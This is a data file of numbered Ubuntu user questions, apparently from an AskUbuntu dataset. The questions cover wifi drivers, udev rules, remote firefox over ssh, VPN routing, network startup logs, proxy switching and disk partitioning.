3498	madwifi vs. ndiswrapper	i 'm going to try and setup wifi on a computer with ubuntu installed where it does n't work out of the box . the computer is an acer veriton l460 with a ar5001 wifi card . there are two options as far as i know : use madwifi use ndiswrapper there are steps for using madwifi here : http : //ubuntuforums.org/showthread.php ? t=1305514 some hints for ndiswrapper are here : http : //ubuntuforums.org/archive/index.php/t-240280.html . the driver seems to be available here : http : //www.netgate.com/support/drivers/sta_24071bin/install/ . so my questions are , are there any other types of ways to do this ? are there any positives and negatives for chosing madwifi or ndiswrapper ? has anyone had success installing this particular wifi card in ubuntu , and if so what did you use ?
3502	non-ascii characters show as boxes in textbox of vb.net application under mono	i 'm running ubuntu 9.10 ( ca n't upgrade due to some applications being incompatible with later versions ) , with all updates installed . a colleague has written a vb.net application which seems to run correctly under mono , however there is an issue with characters in text boxes : if they are not strictly ascii , they show as boxes ( the typical windows replacement character ) . at first i thought it was an issue with greek characters ( which we use ) ; however , i attempted to insert some accented western characters ( like é , which is in the typical western 1252 windows codepage ) , and these too showed up as boxes too , so it 's not strictly an issue with greek . i attempted to type greek in a textbox : the word «δοκιμή» ( test ) . i then selected what i typed , pressed ctrl-c , switched to a native text editor and pressed ctrl-v . the result was “îî¿îºî¹î¼î®” , which is the greek word pretty messed up ( think utf-8 interpreted as latin-1 ; i work a lot with unicode , so it 's easy to recognise such stuff : ) however , if you want to verify , start a python interpreter in a utf-8 capable terminal and try : > > > a= '' îî¿îºî¹î¼î® '' > > > print a.decode ( `` utf8 '' ) .encode ( `` latin1 '' ) .decode ( `` utf8 '' ) δοκιμή which is what i typed ) . now , the application also embeds an internet explorer control ; mono does well emulating it ( i think it uses a gecko engine ) , and in a textbox inside that ie control , i can type fine and see any non-ascii character i want . i would like to know whether there is an issue with my mono configuration or even if it 's a known bug ; vb.net is supposedly unicode-capable , but i do n't know anything about the unicode-capability of the standard controls it uses . so , if you can help me , please advise : what can i do on the ubuntu side to remedy the situation ?
3503	best way to cache apt downloads on a lan ?	i have multiple ubuntu machines at home and a pretty slow internet connection , and sometimes multiple machines need to be updated at once ( especially during new ubuntu releases . ) is there a way where only one of my machines needs to download the packages , and the other machines can use the first machine to get the debs ? does it involve setting up my own local mirror ? or a proxy server ? or can it be made simpler ?
3508	is there a way to turn a virtualbox image into an .iso ?	i 'm in a bit of a pickle here , my main computer has trouble with the nouvou open source driver for nvida cards . as this problem is seemingly quite complicated , i was wondering if there was a way to add/install the nvidia driver from jockey onto a ubuntu/kubuntu .iso file . one possible way could be virtualbox , but i do n't even know if a virtualbox image can be turned into an installaible iso . i know linux mint comes prebundled with it , but i 'd much prefer to stick to the ubuntu line ( what can i say ? i happen to like appindicators and polish ! : p )
3511	how do i create a udev rule for my logitech webcam	with my webcam plugged in at boot , it always defaults to /dev/video0 and my tv-card defaults to /dev/video1 . tvtime defaults is using /dev/video0 . i know that i can run tvtime with the -- device option and force it to switch to /dev/video1 , but if i happen to have my webcam unplugged when i boot , the tv-card becomes video0 . this is very inconvenient , as i have tried to write a `` udev '' rule , to make the webcam video5 but have not been able to get it to work . this is the rule i tried to use : subsystem== '' video4linux '' , bus== '' usb '' , sysfs { idvendor } == '' 046d '' , sysfs { idproduct } == '' 0807 '' , name= '' video5 '' i saved this in /etc/udev/rules.d/75-mystuff.rules , and also tried with a lower number , 15-mystuff.rules , which did n't work . i am using ubuntu 10.04 64bit . any help to resolve this will be very much appreciated . thanks
3512	ca n't get lexmark x5470 printer to work	the printer did work in opensuse , but for some reason it does not print in ubuntu 10.04 ! when i go to add printer , it detects the printer but does not print . does anyone have any suggestions ? i know they are badly supported under linux , but this particular printer did work in a linux machine . all of your help is appreciated .
3515	how do i launch a remote firefox window via ssh ?	when i ssh to a remote box $ ssh -x remotebox then start firefox on the remote box remotebox $ firefox and i have firefox running on my local machine , a local firefox window will open . no firefox process is running on the remote box . if firefox is not running on my local machine then a remote firefox window will open . why is it opening a local firefox window ? how can i prevent that ? update here some more information of my local system linux lesmana-laptop 2.6.32-24-generic # 42-ubuntu smp fri aug 20 14:24:04 utc 2010 i686 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.1 lts release : 10.04 codename : lucid display=:0.0 mozilla firefox 3.6.8 , copyright ( c ) 1998 - 2010 mozilla.org remotebox linux dxray 2.6.22.19-0.4-default # 1 smp 2009-08-14 02:09:16 +0200 x86_64 x86_64 x86_64 gnu/linux lsb version : core-2.0-noarch : core-3.0-noarch : core-2.0-x86_64 : core-3.0-x86_64 : desktop-3.1-amd64 : desktop-3.1-noarch : graphics-2.0-amd64 : graphics-2.0-noarch : graphics-3.1-amd64 : graphics-3.1-noarch distributor id : suse linux description : opensuse 10.3 ( x86-64 ) release : 10.3 codename : n/a display=localhost:15.0 mozilla firefox 3.0.14 , copyright ( c ) 1998 - 2009 mozilla.org this starts a remote firefox session with a remote firefox window . remotebox $ firefox -no-remote this has a brief delay , then drops back to prompt and a local firefox window pops up . no firefox process running on the remotebox . remotebox $ firefox new information . i tried another remote box ( i will name it remotebox2 ) and running firefox from there opened a remote firefox window instead of a local firefox window . linux marvin 2.6.31-22-generic # 60-ubuntu smp thu may 27 00:22:23 utc 2010 i686 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 9.10 release : 9.10 codename : karmic display=localhost:11.0 mozilla firefox 3.6.8 , copyright ( c ) 1998 - 2010 mozilla.org this starts a remote firefox session as expected : remotebox2 $ firefox
3518	connecting to vpn prevents access to normal web sites	i have ubuntu 10.04 installed with openvpn , and when i connect to a vpn , http access to non vpn sites stops working , until i close the vpn connection . to be more specific , both chrome and firefox stop being able to load sites like google.com . sites on my companies intranet are accessible , as well as pages from localhost . i have asked the ubuntu gurus at my company , and they ca n't fix the problem . i have no proxies set up , and the vpn connection uses automatic vpn with no routes .
3520	multiple network connections , where does traffic get routed through ?	my thinkpad has two network interfaces , one wired and one wireless . both interfaces can be connected to a router which in turn is connected to the internet . if both interfaces are connected , are both interfaces used simultaneously or just one at a time . how can i tell which interface is used ?
3522	problems with scid	i 've recently installed scid from ubuntu repositorys . i 've met with 2 problems . 1 ) after install ; there is n't any shortcut made to run program ; so i have to either run it from console or make my own shortcut.my experience so far was that shortcut is made during install . 2 ) i ca n't change width of gui after starting it ; only length .
3528	no alt+f2 in ubuntu netbook 10.10 ?	i am stumped . i upgraded from 10.04 to 10.10 beta 3 and for some reason i ca n't get alt-f2 to do anything . is this a known bug or am i just not doing the right thing ?
3530	what 's happening with windicators ?	will they be available in 10.10 or not ?
3531	how to save font choice in gvim ?	i 'm running ubuntu 9.10 . whenever i open the gvim application , i have to select a custom font ( editâselect font ) . i would like gvim to remember my choice . perhaps i need to edit the ~/.vimrc file , i am not sure . how can i make gvim remember my preference ?
3539	how can i make and distribute an ubuntu screensaver ?	i have no programming language preferences and i have a good knowledge of opengl coding . if i could use something like openframeworks or processing as a base , that would be ideal .
3541	can not paste into gnome terminal from netbeans	when i copy something from another window then my terminal and want to paste it into my terminal ( on the command line ) the paste option in edit is grayed out . ctrl+v does not work in gnome terminal 2.29.6 . i try to copy form netbeans into a terminal . if i paste it somewhere else , in gedit for example , it gets pasted . so it is copied . using ctrl+shift+c/v does not work . is this a settings of from some sort ?
3547	after startup , why do i have to run /etc/init.d/networking restart for networking to work ?	i just fixed the grub install , and found that my wired network connection did not work . i eventually got it working , but each time i restart , i have to manually restart the networking service to bring up the network . how can get the network to come up automatically ? here 's the pertinent info . running ifup gave : $ sudo ifup eth0 unknown interface eth0=eth0 dhclient , did n't work either . i eventually had a look at /etc/network/interfaces , and eth0 was missing : auto lo iface lo inet loopback which i changed to : auto eth0 iface eth0 inet dhcp # auto lo # iface lo inet loopback the error produced by ifup went away but dhclient still still would n't give me an ip , but restarting the network interface did : $ sudo /etc/init.d/networking restart * reconfiguring network interfaces ... rtnetlink answers : no such process there is already a pid file /var/run/dhclient.eth0.pid with pid 1421 killed old client process , removed pid file internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/6c : f0:49 : e3:26 : fd sending on lpf/eth0/6c : f0:49 : e3:26 : fd sending on socket/fallback dhcprelease on eth0 to 192.168.1.1 port 67 send_packet : network is unreachable send_packet : please consult readme file regarding broadcast address . internet systems consortium dhcp client v3.1.3 copyright 2004-2009 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/6c : f0:49 : e3:26 : fd sending on lpf/eth0/6c : f0:49 : e3:26 : fd sending on socket/fallback dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 6 dhcpoffer of 192.168.1.101 from 192.168.1.1 dhcprequest of 192.168.1.101 on eth0 to 255.255.255.255 port 67 dhcpack of 192.168.1.101 from 192.168.1.1 bound to 192.168.1.101 -- renewal in 37830 seconds . ssh stop/waiting ssh start/running , process 1801 here are the related syslog entries for the system start up , and after restarting the network : sep 3 13:38:50 storm-rider kernel : [ 15.490593 ] type=1505 audit ( 1283535469.269:2 ) : operation= '' profile_load '' pid=735 name= '' /sbin/dhclient3 '' sep 3 13:38:50 storm-rider kernel : [ 15.490754 ] type=1505 audit ( 1283535469.269:3 ) : operation= '' profile_load '' pid=735 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' sep 3 13:38:50 storm-rider kernel : [ 15.490833 ] type=1505 audit ( 1283535469.269:4 ) : operation= '' profile_load '' pid=735 name= '' /usr/lib/connman/scripts/dhclient-script '' sep 3 13:38:50 storm-rider kernel : [ 15.670581 ] acpi : resource piix4_smbus [ 0xb00-0xb07 ] conflicts with acpi region sor1 [ 0xb00-0xb0f ] sep 3 13:38:50 storm-rider kernel : [ 15.670581 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver sep 3 13:38:50 storm-rider kernel : [ 15.674793 ] edac mc : ver : 2.1.0 aug 19 2010 sep 3 13:38:50 storm-rider kernel : [ 15.680588 ] edac amd64_edac : ver : 3.2.0 aug 19 2010 sep 3 13:38:50 storm-rider kernel : [ 15.681182 ] edac amd64 : this node reports that memory ecc is currently disabled , set f3x44 [ 22 ] ( 0000:00:18.3 ) . sep 3 13:38:50 storm-rider kernel : [ 15.681196 ] edac amd64 : ecc disabled in the bios or no ecc capability , module will not load . sep 3 13:38:50 storm-rider kernel : [ 15.681196 ] either enable ecc checking or force module loading by setting 'ecc_enable_override ' . sep 3 13:38:50 storm-rider kernel : [ 15.681196 ] ( note that use of the override may cause unknown side effects . ) sep 3 13:38:50 storm-rider kernel : [ 15.681224 ] amd64_edac : probe of 0000:00:18.2 failed with error -22 sep 3 13:38:50 storm-rider kernel : [ 15.769839 ] alloc irq_desc for 16 on node 0 sep 3 13:38:50 storm-rider kernel : [ 15.769844 ] alloc kstat_irqs on node 0 sep 3 13:38:50 storm-rider kernel : [ 15.769860 ] hda intel 0000:00:14.2 : pci int a - > gsi 16 ( level , low ) - > irq 16 sep 3 13:38:50 storm-rider kernel : [ 15.823915 ] console : switching to colour frame buffer device 80x30 sep 3 13:38:50 storm-rider kernel : [ 15.917876 ] nvidia 0000:01:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 sep 3 13:38:50 storm-rider kernel : [ 15.917890 ] nvidia 0000:01:00.0 : setting latency timer to 64 sep 3 13:38:50 storm-rider kernel : [ 15.917899 ] vgaarb : device changed decodes : pci:0000:01:00.0 , olddecodes=io+mem , decodes=none : owns=io+mem sep 3 13:38:50 storm-rider kernel : [ 15.918099 ] nvrm : loading nvidia unix x86_64 kernel module 195.36.24 thu apr 22 19:10:14 pdt 2010 sep 3 13:38:50 storm-rider kernel : [ 16.561300 ] r8169 : eth0 : link down sep 3 13:38:50 storm-rider kernel : [ 16.561648 ] addrconf ( netdev_up ) : eth0 : link is not ready sep 3 13:38:50 storm-rider kernel : [ 17.444914 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode sep 3 13:38:50 storm-rider init : smbd main process ( 1038 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1045 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1050 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1055 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider avahi-daemon [ 957 ] : network interface enumeration completed . sep 3 13:38:50 storm-rider avahi-daemon [ 957 ] : registering hinfo record with values 'x86_64'/'linux ' . sep 3 13:38:50 storm-rider avahi-daemon [ 957 ] : server startup complete . host name is storm-rider.local . local service cookie is 49883856 . sep 3 13:38:50 storm-rider init : smbd main process ( 1060 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1067 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1072 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1077 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1082 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd main process ended , respawning sep 3 13:38:50 storm-rider init : smbd main process ( 1087 ) terminated with status 1 sep 3 13:38:50 storm-rider init : smbd respawning too fast , stopped sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : update_connection_setting_from_if_block : name : eth0 , type:802-3-ethernet , id : ifupdown ( eth0 ) , uuid : 681b428f-beaf-8932-dce4-687ed5bae28e sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : autoconnect sep 3 13:38:50 storm-rider networkmanager : scpluginifupdown : management mode : unmanaged sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:0a.0/0000:03:00.0/net/eth0 , iface : eth0 ) sep 3 13:38:50 storm-rider networkmanager : scpluginifupdown : locking wired connection setting sep 3 13:38:50 storm-rider networkmanager : ifupdown : get unmanaged devices count : 1 sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : ( 37841184 ) ... get_connections . sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : ( 37841184 ) ... get_connections ( managed=false ) : return empty list . sep 3 13:38:50 storm-rider networkmanager : ifupdown : get unmanaged devices count : 1 sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . sep 3 13:38:50 storm-rider networkmanager : scplugin-ifupdown : end _init . sep 3 13:38:50 storm-rider networkmanager : loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . sep 3 13:38:50 storm-rider networkmanager : loaded plugin keyfile : ( c ) 2007 - 2008 red hat , inc. to report bugs please use the networkmanager mailing list . sep 3 13:38:50 storm-rider networkmanager : < info > wifi enabled by radio killswitch ; enabled by state file sep 3 13:38:50 storm-rider networkmanager : < info > wwan enabled by radio killswitch ; enabled by state file sep 3 13:38:50 storm-rider networkmanager : < info > ( eth0 ) : carrier is off sep 3 13:38:50 storm-rider networkmanager : < info > ( eth0 ) : new ethernet device ( driver : 'r8169 ' ) sep 3 13:38:50 storm-rider networkmanager : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 sep 3 13:38:50 storm-rider networkmanager : < info > modem-manager is now available sep 3 13:38:50 storm-rider networkmanager : < warn > default_adapter_cb ( ) : bluez error getting default adapter : the name org.bluez was not provided by any .service files sep 3 13:38:50 storm-rider networkmanager : < info > trying to start the supplicant ... sep 3 13:38:51 storm-rider dhclient : no dhcpoffers received . sep 3 13:38:51 storm-rider dhclient : no working leases in persistent database - sleeping . sep 3 13:38:51 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : found user 'avahi-autoipd ' ( uid 103 ) and group 'avahi-autoipd ' ( gid 110 ) . sep 3 13:38:51 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : successfully called chroot ( ) . sep 3 13:38:51 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : successfully dropped root privileges . sep 3 13:38:51 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : starting with address 169.254.10.181 sep 3 13:38:52 storm-rider gdm-session-worker [ 1113 ] : glib-gobject-critical : g_value_get_boolean : assertion `g_value_holds_boolean ( value ) ' failed sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully called chroot . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully dropped privileges . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully limited resources . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : running . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : canary thread running . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : watchdog thread running . sep 3 13:38:52 storm-rider polkitd [ 1203 ] : started daemon version 0.96 using authority implementation `local ' version `0.96' sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully made thread 1195 of process 1195 ( n/a ) owned by '1000 ' high priority at nice level -11 . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : supervising 1 threads of 1 processes of 1 users . sep 3 13:38:52 storm-rider networkmanager : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) sep 3 13:38:52 storm-rider networkmanager : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully made thread 1241 of process 1195 ( n/a ) owned by '1000 ' rt at priority 5 . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : supervising 2 threads of 1 processes of 1 users . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully made thread 1242 of process 1195 ( n/a ) owned by '1000 ' rt at priority 5 . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : supervising 3 threads of 1 processes of 1 users . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : sucessfully made thread 1244 of process 1244 ( n/a ) owned by '1000 ' high priority at nice level -11 . sep 3 13:38:52 storm-rider rtkit-daemon [ 1197 ] : supervising 4 threads of 2 processes of 1 users . sep 3 13:38:52 storm-rider pulseaudio [ 1244 ] : pid.c : daemon already running . sep 3 13:38:53 storm-rider anacron [ 1405 ] : anacron 2.3 started on 2010-09-03 sep 3 13:38:53 storm-rider kernel : [ 79.823450 ] cpu0 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.823454 ] cpu1 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.823456 ] cpu2 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.823457 ] cpu3 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.823458 ] cpu4 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.823460 ] cpu5 attaching null sched-domain . sep 3 13:38:53 storm-rider kernel : [ 79.903191 ] cpu0 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903193 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903195 ] groups : 0 1 2 3 4 5 sep 3 13:38:53 storm-rider kernel : [ 79.903199 ] cpu1 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903200 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903201 ] groups : 1 2 3 4 5 0 sep 3 13:38:53 storm-rider kernel : [ 79.903203 ] cpu2 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903204 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903205 ] groups : 2 3 4 5 0 1 sep 3 13:38:53 storm-rider kernel : [ 79.903208 ] cpu3 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903209 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903210 ] groups : 3 4 5 0 1 2 sep 3 13:38:53 storm-rider kernel : [ 79.903212 ] cpu4 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903213 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903214 ] groups : 4 5 0 1 2 3 sep 3 13:38:53 storm-rider kernel : [ 79.903216 ] cpu5 attaching sched-domain : sep 3 13:38:53 storm-rider kernel : [ 79.903217 ] domain 0 : span 0-5 level mc sep 3 13:38:53 storm-rider kernel : [ 79.903218 ] groups : 5 0 1 2 3 4 sep 3 13:38:53 storm-rider anacron [ 1405 ] : normal exit ( 0 jobs run ) sep 3 13:38:56 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : callout bind , address 169.254.10.181 on interface eth0 sep 3 13:38:56 storm-rider avahi-daemon [ 957 ] : joining mdns multicast group on interface eth0.ipv4 with address 169.254.10.181 . sep 3 13:38:56 storm-rider avahi-daemon [ 957 ] : new relevant interface eth0.ipv4 for mdns . sep 3 13:38:56 storm-rider avahi-daemon [ 957 ] : registering new address record for 169.254.10.181 on eth0.ipv4 . sep 3 13:39:00 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : successfully claimed ip address 169.254.10.181 sep 3 13:39:14 storm-rider init : ssh main process ( 944 ) terminated with status 255 sep 3 13:39:14 storm-rider ntpdate [ 1514 ] : ca n't find host ntp.ubuntu.com sep 3 13:39:14 storm-rider ntpdate [ 1514 ] : no servers can be used , exiting sep 3 13:39:54 storm-rider aptdaemon : info : initializing daemon sep 3 13:40:13 storm-rider dhclient : internet systems consortium dhcp client v3.1.3 sep 3 13:40:13 storm-rider dhclient : copyright 2004-2009 internet systems consortium . sep 3 13:40:13 storm-rider dhclient : all rights reserved . sep 3 13:40:13 storm-rider dhclient : for info , please visit https : //www.isc.org/software/dhcp/ sep 3 13:40:13 storm-rider dhclient : sep 3 13:40:13 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : got sigterm , quitting . sep 3 13:40:13 storm-rider avahi-autoipd ( eth0 ) [ 1103 ] : callout stop , address 169.254.10.181 on interface eth0 sep 3 13:40:13 storm-rider avahi-daemon [ 957 ] : withdrawing address record for 169.254.10.181 on eth0 . sep 3 13:40:13 storm-rider avahi-daemon [ 957 ] : leaving mdns multicast group on interface eth0.ipv4 with address 169.254.10.181 . sep 3 13:40:13 storm-rider avahi-daemon [ 957 ] : interface eth0.ipv4 no longer relevant for mdns . sep 3 13:40:13 storm-rider dhclient : listening on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:13 storm-rider dhclient : sending on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:13 storm-rider dhclient : sending on socket/fallback sep 3 13:40:17 storm-rider dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 sep 3 13:40:25 storm-rider dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 12 sep 3 13:40:39 storm-rider dhclient : there is already a pid file /var/run/dhclient.eth0.pid with pid 1421 sep 3 13:40:39 storm-rider dhclient : killed old client process , removed pid file sep 3 13:40:39 storm-rider dhclient : internet systems consortium dhcp client v3.1.3 sep 3 13:40:39 storm-rider dhclient : copyright 2004-2009 internet systems consortium . sep 3 13:40:39 storm-rider dhclient : all rights reserved . sep 3 13:40:39 storm-rider dhclient : for info , please visit https : //www.isc.org/software/dhcp/ sep 3 13:40:39 storm-rider dhclient : sep 3 13:40:39 storm-rider dhclient : listening on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:39 storm-rider dhclient : sending on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:39 storm-rider dhclient : sending on socket/fallback sep 3 13:40:39 storm-rider dhclient : dhcprelease on eth0 to 192.168.1.1 port 67 sep 3 13:40:39 storm-rider dhclient : send_packet : network is unreachable sep 3 13:40:39 storm-rider dhclient : send_packet : please consult readme file regarding broadcast address . sep 3 13:40:39 storm-rider dhclient : internet systems consortium dhcp client v3.1.3 sep 3 13:40:39 storm-rider dhclient : copyright 2004-2009 internet systems consortium . sep 3 13:40:39 storm-rider dhclient : all rights reserved . sep 3 13:40:39 storm-rider dhclient : for info , please visit https : //www.isc.org/software/dhcp/ sep 3 13:40:39 storm-rider dhclient : sep 3 13:40:39 storm-rider networkmanager : < info > ( eth0 ) : carrier now on ( device state 1 ) sep 3 13:40:39 storm-rider kernel : [ 186.096615 ] r8169 : eth0 : link up sep 3 13:40:39 storm-rider dhclient : listening on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:39 storm-rider dhclient : sending on lpf/eth0/6c : f0:49 : e3:26 : fd sep 3 13:40:39 storm-rider dhclient : sending on socket/fallback sep 3 13:40:41 storm-rider avahi-daemon [ 957 ] : registering new address record for fe80 : :6ef0:49ff : fee3:26fd on eth0.* . sep 3 13:40:43 storm-rider dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 6 sep 3 13:40:43 storm-rider dhclient : dhcpoffer of 192.168.1.101 from 192.168.1.1 sep 3 13:40:43 storm-rider dhclient : dhcprequest of 192.168.1.101 on eth0 to 255.255.255.255 port 67 sep 3 13:40:43 storm-rider dhclient : dhcpack of 192.168.1.101 from 192.168.1.1 sep 3 13:40:43 storm-rider avahi-daemon [ 957 ] : joining mdns multicast group on interface eth0.ipv4 with address 192.168.1.101 . sep 3 13:40:43 storm-rider avahi-daemon [ 957 ] : new relevant interface eth0.ipv4 for mdns . sep 3 13:40:43 storm-rider avahi-daemon [ 957 ] : registering new address record for 192.168.1.101 on eth0.ipv4 . sep 3 13:40:43 storm-rider dhclient : bound to 192.168.1.101 -- renewal in 37830 seconds .
3549	how do i upgrade to ubuntu 10.04.1 lts	i want upgrade from ubuntu 10.04 lts to ubuntu 10.04.1 lts . is there a basic update ? how do i do it ?
3554	how to make my proxy settings change depending on the network i connect to ?	my company 's corporate network requires me to set a network proxy to access the net , but when i am anywhere else , i do n't need it . the proxy settings in ubuntu ( system - > preferences - > proxy server ) allowed me to create `` locations '' that i can manually select . then i have a `` default '' location ( with no proxy ) and a `` work '' location ( with my company 's proxy in it ) . is there a way to make ubuntu automatically select the `` work '' location based on the connection i 'm using ? i thought i could use the ip subnet ( very specific ) to detect where i am , but i have no idea how to set it up ... edit : i really need to have the proxy settings set at the system level . all my network connections ( imap , smtp , chat , etc ) need to go through the proxy . not only the web browser .
3557	how can i get my microsoft lifecam vx-1000 webcam microphone to work ?	how can i get my webcam 's ( microsoft lifecam vx-1000 ) microphone to work ? it uses the uvcvideo driver and video quality is perfect on both cheese and gmail 's video chat .
3561	how do i monitor disk activity on a specific drive ?	i 'd like to watch disk activity on my usb external hard drive . i know that i can use iotop to monitor disk i/o for each running process , but is there a way to get a measure per filesystem ?
3564	how do i play an mp3 or wav through the computer 's internal speaker ?	i 'd like to have a script play a pretty chime sound as a notification , but i want it to use the internal speaker because the external sound system is n't always powered on . beeping is not an option ; it makes passers-by think there is something wrong .
3573	any howtos on de-xen'ing a box ?	i have a box that has xen on it . it currently has only one domu . given that xen is n't supported in the newer versions of ubuntu ... are there any good howtos or other instructions for removing xen ? my specific situation is : 3 drives mirrored via raid1 software raid . lvm on top . i was thinking something like removing one of the drives , getting my domu to boot of that and then re-raid1 from that drive . but i 'm not really sure how to go about doing that with mdadm . : -/
3576	how to make usb drive as local repository	i copied `` archives '' folder ( /var/cache/apt/archives ) from another computer which was fully updated and had some packages that i want . can someone guide me how to add my usb drive in repository list so that i can install those packages from it ? thanks .
3577	how to watch eurosport player ?	they use silverlight -- therefore i installed moonlight but still get a black screen . is there a way to watch it on ubuntu ? i now use a virtual ( windows xp ) machine so i can still watch it , but would like to know it there are possibilities .
3578	tool to add shapes , annotations and text using templates to images	often i need to annotate ( draw some arrows , lines , basic shapes like squares , ellipses etc and enter some text ) on top of pictures ( jpg , png images ) and screenshots ( again png images ) . i would also need to be able to crop , resize etc . i tried the gimp but i could only enter text and perform all image transformations but could n't find a way to draw boxes etc . i finally settled to openoffice.org draw , but i know that is n't what i want , because in oodraw i need to insert my pic into a drawing and resize it ( or the drawing ) to fit and then go about making changes and finally export to png ... is there any image editor that allows adding shapes and text to jpg & png files and save the modified file in its place ? if the tool can also have template collections ( like dia does ) for shapes that is an added bonus .
3580	gnome does not remember last file location if you untar a file	if i download a packed file , and then want to open , the gnome file system points me to my home directory . i want to go some other path , so i browse there and unpack it . a moment later , another packed file download , and this time it points me to my home directory again , instead of the last location i unpacked the tar file . is it possible in gnome to make it remember the last location where you unpacked a file some moments ago ? using ubuntu 10.04 , fresh install .
3586	moving the start menu bar	how do i move the start bar on top to the right or left edge of the screen ?
3592	how to configure partitions across two physical drives ?	i am a linux/ubuntu newbie installing ubuntu server 10.04 on a fresh box as a web server . my box has two physical drives ( 40gb and 160gb ) , and i wish to use them both . with no previous experience in installing ubuntu , what partitions should i create that will best utilize my disk space , but also be stable with reasonable performance ?
3596	what is lvm and what is it used for ?	as a linux/ubuntu newbie , what is lvm and what is it used for ? in terms of a web server installation , what benefits does it provide ? would you recommend using it ?
